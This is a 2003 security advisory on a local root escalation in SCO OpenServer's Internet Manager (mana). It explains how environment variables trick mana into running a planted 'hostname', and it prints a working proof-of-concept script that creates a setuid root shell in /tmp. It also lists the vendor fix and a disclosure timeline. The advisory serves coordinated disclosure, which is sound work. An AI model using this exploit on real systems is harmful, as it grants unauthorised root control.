----------------------------------------------------------------------- Texonet Security Advisory 20030902 ----------------------------------------------------------------------- Advisory ID : TEXONET-20030902 Authors : Joel Soderberg and Christer Oberg Issue date : Tuesday, September 02, 2003 Publish date : Monday, September 15, 2003 Application : SCO OpenServer / Internet Manager (mana) Version(s) : 5.0.5 - 5.0.7 Platforms : OpenServer Availability : http://www.texonet.com/advisories/TEXONET-20030902.txt ----------------------------------------------------------------------- Problem: ----------------------------------------------------------------------- A vulnerability in SCO Internet Manager (mana) program for OpenServer (SCO Unix) that lets local users gain root level privileges. Description: ----------------------------------------------------------------------- Short description from SCO: "SCO Internet Manager - allowing users to easily configure and manage Internet and intranet servers." The SCO Internet Manager (mana) is designed to be run via the ncsa_httpd on port 615 and it is password protected. Running /usr/internet/admin/mana/mana locally is however possible. By exporting the environment variable REMOTE_ADDR and setting it to 127.0.0.1 mana is tricked to execute the file menu.mana as if it was run via the nsca_httpd password protected area. An other interesting environment variable is PATH_INFO which tells mana what .mana file should be run. The file pass-err.mana contains the following lines: if {[catch {exec hostname} hostName] != 0} { set hostName localhost } set mana(localHostName) $hostName return {} This tells us that mana will execute "hostname" when this file is run. By changing the environment variables PATH_INFO to /pass-err.mana and PATH to ./:$PATH would make mana execute ./hostname with root privileges. Example (Simple POC): This proof of concept for OpenServer 5.0.7 should give any local user euid=0(root). $ uname -a SCO_SV openserv 3.2 5.0.7 i386 $ id uid=200(test) gid=50(group) groups=50(group) $ sh mana-root.sh # id uid=200(test) gid=50(group) euid=0(root) groups=50(group) - Code Start - mana-root.sh ----------------------------C-U-T---H-E-R-E---------------------------- #!/bin/sh # # OpenServer 5.0.7 - Local mana root shell # # REMOTE_ADDR=127.0.0.1 PATH_INFO=/pass-err.mana PATH=./:$PATH export REMOTE_ADDR export PATH_INFO export PATH echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname chmod 755 hostname /usr/internet/admin/mana/mana > /dev/null /tmp/sh ----------------------------C-U-T---H-E-R-E---------------------------- - Code End – Workaround: ----------------------------------------------------------------------- The proper solution is to install the latest packages. Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19 Verification MD5 (VOL.000.000) = 37b55df2c9000c703a22baafbe9cef42 md5 is available for download from ftp://ftp.sco.com/pub/security/tools Installing Fixed Binaries Upgrade the affected binaries with the following sequence: 1) Download the VOL* files to the /tmp directory 2) Run the custom command, specify an install from media images, and specify the /tmp directory as the location of the images. Disclosure Timeline: ----------------------------------------------------------------------- 9/02/2003: Vendor notified by e-mail 9/03/2003: Vendor has verified the issue and is working on the solution 9/15/2003: Public release About Texonet: ----------------------------------------------------------------------- Texonet is a Swedish based security company with a focus on penetration testing / security assessments, research and development. Contacting Texonet: ----------------------------------------------------------------------- E-mail: advisories(-at-)texonet.com Homepage: http://www.texonet.com/ Phone: +46-8-55174611